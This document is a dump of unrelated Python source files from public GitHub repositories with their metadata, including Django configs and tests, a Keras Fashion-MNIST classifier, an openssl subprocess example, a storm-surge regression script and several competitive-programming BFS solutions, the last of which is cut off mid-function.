permissive
|
EdgarOrnelas/learning-circles
|
cd164f123885ed2079b34ad394c9849b370563b9
|
293c849321d735aebbdcb6c65b7c92f751f9fd89
|
refs/heads/master
| 2021-01-21T20:56:35.429589
| 2017-06-16T09:20:46
| 2017-06-16T09:20:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 441
|
py
|
"""
WSGI config for learnwithpeople project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "learnwithpeople.settings")
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
application = Cling(get_wsgi_application())
|
[
"dirkcuys@gmail.com"
] |
dirkcuys@gmail.com
|
fd762726f5e677c8313ab0c32b7230cce74d9b04
|
2b4790d77439d89ad27bdd04bac539283f0dd605
|
/basic_ex/11-module.py
|
f30ced73ca20173a9af871afa196d9b7e56f467c
|
[] |
no_license
|
ajioy/python-ex
|
9fde4bcfe35edeee5050365660a03bdb6b913da1
|
982a3cdf0de0e140faa4cb539f2961b311de2c2a
|
refs/heads/master
| 2020-04-05T14:06:09.909935
| 2018-08-14T14:43:55
| 2018-08-14T14:43:55
| 59,105,033
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
# -*- coding:utf-8 -*-
import sys
def test():
args = sys.argv
if len(args) == 1:
print 'Hello, world'
elif len(args) == 2:
print 'Hello, %s' % args[1]
else:
print 'Too many arguments!'
if __name__ == '__main__':
test()
|
[
"ajioy@hotmail.com"
] |
ajioy@hotmail.com
|
c1060ead727b0ede86f928cc668a97b2d4ad13c8
|
b6ab5a3ff4402ed085557cd5ff354ab2ead6e6f8
|
/leet_code/rotten_oranges.py
|
3f761e12152d708fc5ec530ac701836bb1ed4be6
|
[] |
no_license
|
sahiljajodia01/Competitive-Programming
|
e51587110640663aa32f220feddf6ab10f17c445
|
7ae9b45654aff513bceb0fc058a67ca49273a369
|
refs/heads/master
| 2021-07-17T08:23:24.143156
| 2020-06-05T11:34:14
| 2020-06-05T11:34:14
| 163,054,750
| 0
| 1
| null | 2019-10-31T05:36:35
| 2018-12-25T06:48:39
|
C++
|
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
# https://leetcode.com/problems/rotting-oranges/
####### Straightforward BFS solution ##########
class Solution:
def orangesRotting(self, grid: List[List[int]]) -> int:
q = []
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 2:
q.append([i, j])
minute = 0
while q != []:
# print(q)
minute += 1
temp = []
for i in range(len(q)):
x, y = q[i]
neighbours = [[1, 0], [0, 1], [-1, 0], [0, -1]]
for n in neighbours:
xn, yn = (x + n[0]), (y+ n[1])
if xn < 0 or xn >= len(grid) or yn < 0 or yn >= len(grid[0]) or grid[xn][yn] == 0 or grid[xn][yn] == 2:
continue
grid[xn][yn] = 2
if [xn, yn] not in temp:
temp.append([xn, yn])
q = temp
# print(minute)
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 1:
return -1
if minute == 0:
return 0
return minute - 1
|
[
"sahil.jajodia@gmail.com"
] |
sahil.jajodia@gmail.com
|
6f89b5f827a55c4d0a84b8ab0580245c093ab1d8
|
acb14262588fb356efb3d1bf3aab8634e43f1a4f
|
/app/recipe/tests/test_tag_api.py
|
9ecdb111ed9fe55141cc540e61cd2ba1bb1d3d2c
|
[
"MIT"
] |
permissive
|
Gilles00/recipe-app-api
|
6d37157e4e0081ba152ccca740fdd13ad03d3aaf
|
2ea0de068db0dcc500d54164739184ace1a29a7b
|
refs/heads/master
| 2022-03-05T18:00:13.893911
| 2019-11-26T11:56:05
| 2019-11-26T11:56:05
| 259,035,229
| 1
| 0
|
MIT
| 2020-04-26T13:18:13
| 2020-04-26T13:18:12
| null |
UTF-8
|
Python
| false
| false
| 3,126
|
py
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse("recipe:tag-list")
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is requried for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
"test@shahwan.me", "password123"
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name="Vegan")
Tag.objects.create(user=self.user, name="Dessert")
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by("-name")
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user("other@shahwan.me", "testpass")
Tag.objects.create(user=user2, name="Fruity")
tag = Tag.objects.create(user=self.user, name="Comfort food")
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]["name"], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {"name": "Test tag"}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(user=self.user, name=payload["name"]).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating tag with invalid payload"""
payload = {"name": ""}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
tag1 = Tag.objects.create(user=self.user, name="Breakfast")
tag2 = Tag.objects.create(user=self.user, name="lunch")
recipe = Recipe.objects.create(
title="Coriander eggs on toast", time_minutes=10, price=5.00, user=self.user
)
recipe.tags.add(tag1)
res = self.client.get(TAGS_URL, {"assigned_only": 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
|
[
"ahmed@shahwan.me"
] |
ahmed@shahwan.me
|
9b2c3283708ae762deba2107258c8ec473d5a3cd
|
4f2f046ba81f07be7fcb0649a7d7ce55fcd9e98f
|
/tests/tests.py
|
5547f7a7f98b5d28140501f313b6b6305c838e56
|
[] |
no_license
|
konradkrasno/db_helper_manager
|
3a4b1ceca70953938ac348b855da82bf3bfe9eb0
|
273f5146437784684d069a209b98eb6d71d4756f
|
refs/heads/master
| 2023-04-21T14:57:33.434170
| 2021-05-09T18:52:01
| 2021-05-09T18:52:01
| 365,552,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,523
|
py
|
import unittest
from typing import Dict
from unittest import TestCase
from unittest.mock import patch, call
from db_helper_manager.db_manager import DBManager
from db_helper_manager.exceptions import ApiError
from db_helper_manager.rates import Rate
class Fixture(TestCase):
@staticmethod
def db_config() -> Dict:
return {
"DIALECT": "mysql",
"NAME": "test",
"USER": "test",
"PASSWORD": "test",
"HOST": "localhost",
"PORT": 3306,
}
@staticmethod
def json() -> Dict:
return {
"table": "A",
"currency": "dolar amerykański",
"code": "USD",
"rates": [
{
"no": "087/A/NBP/2021",
"effectiveDate": "2021-05-07",
"mid": 3.7861,
}
],
}
def setUp(self) -> None:
self.manager = DBManager(self.db_config())
def tearDown(self) -> None:
pass
class RateTests(Fixture):
@patch("requests.get")
def test_get_current_rate_in_pln_when_ok(self, mock_get):
mock_get.return_value.status_code = 200
mock_get.return_value.json = self.json
rate = Rate.get_current_rate_in_pln("usd")
self.assertEqual(rate, 3.7861)
@patch("requests.get")
def test_get_current_rate_in_pln_when_error(self, mock_get):
mock_get.return_value.status_code = 404
with self.assertRaises(ApiError):
Rate.get_current_rate_in_pln("usd")
class CommandsTests(Fixture):
@patch("db_helper_manager.commands.logger")
@patch("db_helper_manager.commands.text")
@patch("db_helper_manager.commands.UpdateUnitPrices.get_current_rate_in_pln")
@patch("db_helper_manager.commands.Session.execute")
def test_update_unit_prices(self, mock_session, mock_rate, mock_text, mock_logger):
mock_text.return_value = "mocked statement"
mock_rate.return_value = 3.7861
self.manager.update_unit_prices()
mock_session.assert_called_once_with(
"mocked statement",
[
{
"EURORate": 3.7861,
"USDRate": 3.7861,
}
],
)
mock_logger.info.assert_called()
@patch("db_helper_manager.commands.logger")
@patch("db_helper_manager.commands.csv.writer")
@patch("builtins.open")
@patch("db_helper_manager.commands.Session.execute")
def test_fetch_product_data_as_csv(
self, mock_session, mock_open, mock_writer, mock_logger
):
mock_session.return_value = [["fake1"], ["fake2"]]
self.manager.fetch_product_data_as_csv()
mock_open.assert_called_once_with("products.csv", "w", newline="")
expected_calls = [call(self.manager.fields), call(["fake1"]), call(["fake2"])]
mock_writer().writerow.assert_has_calls(expected_calls)
mock_logger.info.assert_called_once_with("Data successfully downloaded.")
@patch("db_helper_manager.commands.UpdateUnitPrices.update_unit_prices")
@patch("db_helper_manager.commands.FetchProductData.fetch_product_data_as_csv")
def test_execute_command(self, mock_fetch_data, mock_update_prices):
self.manager.execute_command("fetch_product_data_as_csv")
mock_fetch_data.assert_called_once()
self.manager.execute_command("update_unit_prices")
mock_update_prices.assert_called_once()
@patch("db_helper_manager.commands.Commands.print_command_list")
def test_execute_command_when_wrong_command(self, mock_print_command_list):
self.manager.execute_command("wrong_command")
mock_print_command_list.assert_called_once()
@patch("builtins.print")
def test_execute_command_when_wrong_args(self, mock_print):
self.manager.execute_command("update_unit_prices", "arg1", "arg2")
mock_print.assert_called_once_with(
"update_unit_prices() takes 1 positional argument but 3 were given"
)
@patch("db_helper_manager.commands.logger")
@patch("db_helper_manager.commands.UpdateUnitPrices.update_unit_prices")
def test_execute_command_when_error(self, mock_update_prices, mock_logger):
mock_update_prices.side_effect = Exception("Exception occurred")
self.manager.execute_command("update_unit_prices")
mock_logger.exception.assert_called_once_with(mock_update_prices.side_effect)
if __name__ == "__main__":
unittest.main()
|
[
"konradkrasno@gmail.com"
] |
konradkrasno@gmail.com
|
0f7bf9ae5f1cdcff88b17c9469e88632bb26be4e
|
a66fd9c13d2705c1603fb10909ee9074659a1055
|
/03_DNN_Mnist_fashion_keras.py
|
c0a6cdfbd29ac3338e5ef1a6397a646da341b9f2
|
[] |
no_license
|
lhs7091/pythonTensor2
|
feaf609402b2e2cc7c02ec00704a1430e309ef8a
|
0c5e7165c1e2b1e99b68ab932f811facf2b01043
|
refs/heads/master
| 2021-02-27T03:09:47.524839
| 2020-03-08T07:00:05
| 2020-03-08T07:00:05
| 245,572,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,798
|
py
|
from tensorflow.keras.datasets import fashion_mnist
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow_core.python.keras.layers import Flatten
import matplotlib.pyplot as plt
import numpy as np
import random
(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()
labels = {0:'T-shirt/top',
1:'Trouser',
2:'Pullover',
3:'Dress',
4:'Coat',
5:'Sandal',
6:'Shirt',
7:'Sneaker',
8:'Bag',
9:'Ankle Boot'}
# dataset reshape
# array -> category
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# scaling
X_train = X_train/255.0
X_test = X_test/255.0
# modeling
model = Sequential()
model.add(Dense(784, input_shape=(28,28,), activation='relu'))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dense(10, activation='softmax'))
model.summary()
#compiling models
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# input dataset in model
model.fit(X_train, y_train, batch_size=200, epochs=1, validation_split=0.2)
'''
48000/48000 [==============================] - 22s 462us/sample - loss: 0.2445 - accuracy: 0.9248 - val_loss: 0.1263 - val_accuracy: 0.9633
'''
# evaluation
score = model.evaluate(X_test, y_test)
print(score)
'''
10000/10000 [==============================] - 2s 202us/sample - loss: 0.1285 - accuracy: 0.9611
[0.12847008485868572, 0.9611]
'''
# real prediction
prediction = model.predict(X_test)
r = random.randint(0, y_test.shape[0])
print('label:', labels[np.argmax(y_test[r])])
print('prediction:', labels[np.argmax(prediction[r])])
plt.imshow(X_test[r].reshape(28,28), cmap='binary')
plt.show()
|
[
"lhs7091@naver.com"
] |
lhs7091@naver.com
|
ebb32f52c472bcc16a1678079beff87a7a0bae7c
|
4b3883b1591987c6fbcddab7fd2e15d7b7243861
|
/books/effectivepy-v2/chap7/ad52/encrypt_data.py
|
9c4eeb95ad2d0770adbea5f23a8c6f6674edb294
|
[
"MIT"
] |
permissive
|
MerleLiuKun/my-python
|
41bdbf6e05281728a824e04da043902dc0fd4698
|
0bec138cc6a9870ca47e0e62e9b92d50fb6cb3d8
|
refs/heads/master
| 2021-06-11T10:22:44.948418
| 2021-06-02T13:08:18
| 2021-06-02T13:08:18
| 160,791,142
| 1
| 1
|
MIT
| 2020-05-19T15:10:00
| 2018-12-07T07:58:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
"""
"""
import os
import subprocess
def run_encrypt(data):
env = os.environ.copy()
env["password"] = "zf7ShyBhZOraQDdE/FiZpm/m/8f9X+M1"
proc = subprocess.Popen(
["openssl", "enc", "-des3", "-pass", "env:password"],
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
proc.stdin.write(data)
proc.stdin.flush()
return proc
# procs = []
# for _ in range(3):
# data = os.urandom(10)
# proc = run_encrypt(data)
# procs.append(proc)
#
# for proc in procs:
# out, _ = proc.communicate()
# print(out[-10:])
def run_hash(input_stdin):
return subprocess.Popen(
["openssl", "dgst", "-whirlpool", "-binary"],
stdin=input_stdin,
stdout=subprocess.PIPE,
)
encrypt_procs = []
hash_procs = []
for _ in range(10):
data = os.urandom(100)
e_proc = run_encrypt(data)
encrypt_procs.append(e_proc)
h_proc = run_hash(e_proc.stdout)
hash_procs.append(h_proc)
e_proc.stdout.close()
e_proc.stdout = None
for proc in encrypt_procs:
proc.communicate()
assert proc.returncode == 0
for proc in hash_procs:
out, _ = proc.communicate()
print(out[-10:])
assert proc.returncode == 0
|
[
"merle.liukun@gmail.com"
] |
merle.liukun@gmail.com
|
aaf296fd3b0614fc9cefe51e775d229b510d5319
|
cf152c053f2cedf819b81c1a746db87e07fe5ded
|
/DL/day5_buy_apple.py
|
8e98900ac8a85f86c337ee4b50fefe7e84907b89
|
[] |
no_license
|
aorura/tensorProject
|
db684e0b4aa46d9d4afd1c4b9f5bed8aa99a4c06
|
014db9a8ae8c76299c99f77dafb401cf2e86a3cc
|
refs/heads/master
| 2020-03-08T02:18:56.227130
| 2018-04-06T07:48:41
| 2018-04-06T07:48:41
| 127,855,918
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
from day5_layer_naive import *
apple=100
apple_num=2
tax=1.1
mul_apple_layer=MultiLayer()
mul_tax_layer=MultiLayer()
#forward
apple_price=mul_apple_layer.forward(apple, apple_num)
price=mul_tax_layer.forward(apple_price, tax)
#backward
dprice=1
dapple_price, dtax=mul_tax_layer.backward(dprice)
dapple, dapple_num=mul_apple_layer.backward(dapple_price)
print("price:", int(price))
print("dapple:", dapple)
print("dapple_num:", int(dapple_num))
print("dtax:", dtax)
|
[
"hyponus@gmail.com"
] |
hyponus@gmail.com
|
453723dc7712c3b5489ebdf23891d325b1e539bd
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/cherrypy/wsgiserver/ssl_builtin.py
|
3366c31bd7cd1a1aab714c33fc208694974566ad
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\lib\cherrypy\wsgiserver\ssl_builtin.py
try:
import ssl
except ImportError:
ssl = None
from cherrypy import wsgiserver
class BuiltinSSLAdapter(wsgiserver.SSLAdapter):
certificate = None
private_key = None
def __init__(self, certificate, private_key, certificate_chain = None):
if ssl is None:
raise ImportError('You must install the ssl module to use HTTPS.')
self.certificate = certificate
self.private_key = private_key
self.certificate_chain = certificate_chain
def bind(self, sock):
return sock
def wrap(self, sock):
try:
s = ssl.wrap_socket(sock, do_handshake_on_connect=True, server_side=True, certfile=self.certificate, keyfile=self.private_key, ssl_version=ssl.PROTOCOL_SSLv23)
except ssl.SSLError as e:
if e.errno == ssl.SSL_ERROR_EOF:
return (None, {})
if e.errno == ssl.SSL_ERROR_SSL:
if e.args[1].endswith('http request'):
raise wsgiserver.NoSSLError
raise
return (s, self.get_environ(s))
def get_environ(self, sock):
cipher = sock.cipher()
ssl_environ = {'wsgi.url_scheme': 'https',
'HTTPS': 'on',
'SSL_PROTOCOL': cipher[1],
'SSL_CIPHER': cipher[0]}
return ssl_environ
def makefile(self, sock, mode = 'r', bufsize = -1):
return wsgiserver.CP_fileobject(sock, mode, bufsize)
|
[
"le02005@163.com"
] |
le02005@163.com
|
c16203a4ae9e23eee50178108cef12cff2782847
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/03_model_fitting/merra882/567-tideGauge.py
|
b9b17c856c072ef1398bd25f5d67edcae774eb05
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,041
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a multiple
linear regression model by using the KFOLD method
@author: Michael Tadesse
"""
import os
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
from datetime import datetime
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validate():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraLRValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 567
y = 568
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
tg_name = os.listdir()[tg]
print(tg, tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
lm = LinearRegression()
lm.fit(X_train, y_train)
#predictions
predictions = lm.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#cd to dir_in
os.chdir(dir_in)
#run script
validate()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
aa92cd5b6a1e281f0e443f81d8e6a51fb80d2c9d
|
a89c80dac438747db4dd60e5f9d35c33d9c231bc
|
/bootstrap/legacy/container_0/term.py
|
e44003b63ae8b5c2e4b9c89b9f1c160e69d7eefa
|
[
"MIT"
] |
permissive
|
Trixter9994/lazero
|
09cd13e889421d6567b54aeb5142a7a937b1f35f
|
5a2b7f7499fb11e71885defab130dead7864b9fd
|
refs/heads/master
| 2022-12-17T08:40:14.533371
| 2020-09-22T03:12:04
| 2020-09-22T03:12:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
from gi.repository import Gtk, Vte, GLib, Pango, Gio
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Vte', '2.91')
# if you really want to, use java instead to do terminal emulation.
# no fucking horrible shits, please?
# either replace it or use it.
class TheWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="GTK3 IDE")
self.set_default_size(600, 300)
terminal = Vte.Terminal()
#pty = terminal.pty_new_sync(Vte.PtyFlags.DEFAULT)
pty = Vte.Pty.new_sync(Vte.PtyFlags.DEFAULT)
terminal.set_pty(pty)
pty.spawn_async(
None,
["/bin/python"],
None,
GLib.SpawnFlags.DO_NOT_REAP_CHILD,
None,
None,
-1,
None,
self.ready
)
# self.terminal.get_pty(self.pty)
box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
scroller = Gtk.ScrolledWindow()
scroller.set_hexpand(True)
scroller.set_vexpand(True)
scroller.add(terminal)
box.pack_start(scroller, False, True, 2)
self.add(box)
def ready(self, pty, task):
print('pty ', pty)
win = TheWindow()
win.connect('destroy', Gtk.main_quit)
win.show_all()
Gtk.main()
# what the heck?
# check the implementation of vscode terminal. -> the joke out there.
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
0bc916255bfd134ba21182595402124b86032802
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_flimflam.py
|
e214907d239173c947b6d0e4fe3c7014e4c32002
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#calss header
class _FLIMFLAM():
def __init__(self,):
self.name = "FLIMFLAM"
self.definitions = [u'talk that is confusing and intended to deceive']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
2040a05f18652b0a19ade2c74ef5fe69dd3abe92
|
e99d2630e6acd8d2496c77c8ee215f9d82a610b8
|
/tests/test_bazel_workspace.py
|
39b7e0e615eae59d9777ea9d20496be15527d46a
|
[
"Apache-2.0"
] |
permissive
|
useblocks/sphinx-bazel
|
0acbbc13331356a871e5a75ebadee2b2158c4df7
|
38f5403393eb08f651100b21648efe2af6b4b047
|
refs/heads/master
| 2021-08-22T22:31:20.339073
| 2021-06-18T04:53:57
| 2021-06-18T04:53:57
| 171,243,259
| 11
| 4
|
Apache-2.0
| 2021-06-18T04:53:58
| 2019-02-18T08:23:47
|
Python
|
UTF-8
|
Python
| false
| false
| 426
|
py
|
try:
from pathlib import Path
except ImportError:
from pathlib2 import Path
from sphinx_testing import with_app
@with_app(buildername='html', srcdir='doc_test/bazel_workspace') # , warningiserror=True)
def test_bazel_workspace(app, status, warning):
app.build()
html = Path(app.outdir, 'index.html').read_text()
assert 'workspace-my_workspace_name' in html
assert 'workspace description' in html
|
[
"daniel.woste@useblocks.com"
] |
daniel.woste@useblocks.com
|
21d83e44ad8d952e8947a946bf94f29b3f270b16
|
de4d88db6ea32d20020c169f734edd4b95c3092d
|
/aiotdlib/api/types/basic_group.py
|
b64635412e5b8db8ca6213e66e871468534ccc6b
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
thiagosm/aiotdlib
|
5cc790a5645f7e4cc61bbd0791433ed182d69062
|
4528fcfca7c5c69b54a878ce6ce60e934a2dcc73
|
refs/heads/main
| 2023-08-15T05:16:28.436803
| 2021-10-18T20:41:27
| 2021-10-18T20:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from .chat_member_status import ChatMemberStatus
from ..base_object import BaseObject
class BasicGroup(BaseObject):
"""
Represents a basic group of 0-200 users (must be upgraded to a supergroup to accommodate more than 200 users)
:param id: Group identifier
:type id: :class:`int`
:param member_count: Number of members in the group
:type member_count: :class:`int`
:param status: Status of the current user in the group
:type status: :class:`ChatMemberStatus`
:param is_active: True, if the group is active
:type is_active: :class:`bool`
:param upgraded_to_supergroup_id: Identifier of the supergroup to which this group was upgraded; 0 if none
:type upgraded_to_supergroup_id: :class:`int`
"""
ID: str = Field("basicGroup", alias="@type")
id: int
member_count: int
status: ChatMemberStatus
is_active: bool
upgraded_to_supergroup_id: int
@staticmethod
def read(q: dict) -> BasicGroup:
return BasicGroup.construct(**q)
|
[
"pylakey@protonmail.com"
] |
pylakey@protonmail.com
|
2bf06aaed7534278af8791becf25639426bcc480
|
cf5f24e5a32f8cafe90d4253d727b1c0457da6a4
|
/algorithm/boj_16985.py
|
a3f12c8374c713064a9eea0eb995f12079fa3a68
|
[] |
no_license
|
seoljeongwoo/learn
|
537659ca942875f6846646c2e21e1e9f2e5b811e
|
5b423e475c8f2bc47cb6dee09b8961d83ab08568
|
refs/heads/main
| 2023-05-04T18:07:27.592058
| 2021-05-05T17:32:50
| 2021-05-05T17:32:50
| 324,725,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,164
|
py
|
import sys
from itertools import permutations
from collections import deque
input =sys.stdin.readline
ret = int(1e9)
def range_check(x,y,z):
return 0<=x<5 and 0<=y<5 and 0<=z<5
def rotate(temp, h):
new_temp = [ [ 0 for i in range(5)] for j in range(5)]
for i in range(5):
for j in range(5):
new_temp[4-j][i] = temp[h][i][j]
for i in range(5):
for j in range(5):
temp[h][i][j] = new_temp[i][j]
return temp
def bfs(temp):
global ret
q = deque()
if temp[0][0][0] == 0: return
q.append((0,0,0))
